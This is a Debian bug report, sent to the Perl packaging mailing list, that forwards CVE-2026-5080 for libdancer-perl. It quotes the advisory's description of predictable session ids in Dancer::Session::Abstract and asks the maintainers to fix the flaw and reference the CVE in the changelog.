Bug#1135322: libdancer-perl: CVE-2026-5080
Salvatore Bonaccorso
carnil at debian.org
Fri May 1 06:59:43 BST 2026
Source: libdancer-perl
Version: 1.3522-1
Severity: important
Tags: security upstream
X-Debbugs-Cc: carnil at debian.org, Debian Security Team <team at security.debian.org>
Hi,
The following vulnerability was published for libdancer-perl.
CVE-2026-5080[0]:
| Dancer::Session::Abstract versions through 1.3522 for Perl generates
| session ids insecurely. The session id is generated from summing
| the character codepoints of the absolute pathname with the process
| id, the epoch time and calls to the built-in rand() function to
| return a number between 0 and 999-billion, and concatenating that
| result three times. The path name might be known or guessed by an
| attacker, especially for applications known to be written using
| Dancer with standard installation locations. The epoch time can be
| guessed by an attacker, and may be leaked in the HTTP header. The
| process id comes from a small set of numbers, and workers may have
| sequential process ids. The built-in rand() function is seeded with
| 32-bits and is considered unsuitable for security applications.
| Predictable session ids could allow an attacker to gain access to
| systems.
If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
For further information see:
[0] https://security-tracker.debian.org/tracker/CVE-2026-5080
https://www.cve.org/CVERecord?id=CVE-2026-5080
[1] https://lists.security.metacpan.org/cve-announce/msg/39488574/
Please adjust the affected versions in the BTS as needed.
Regards,
Salvatore
More information about the pkg-perl-maintainers
mailing list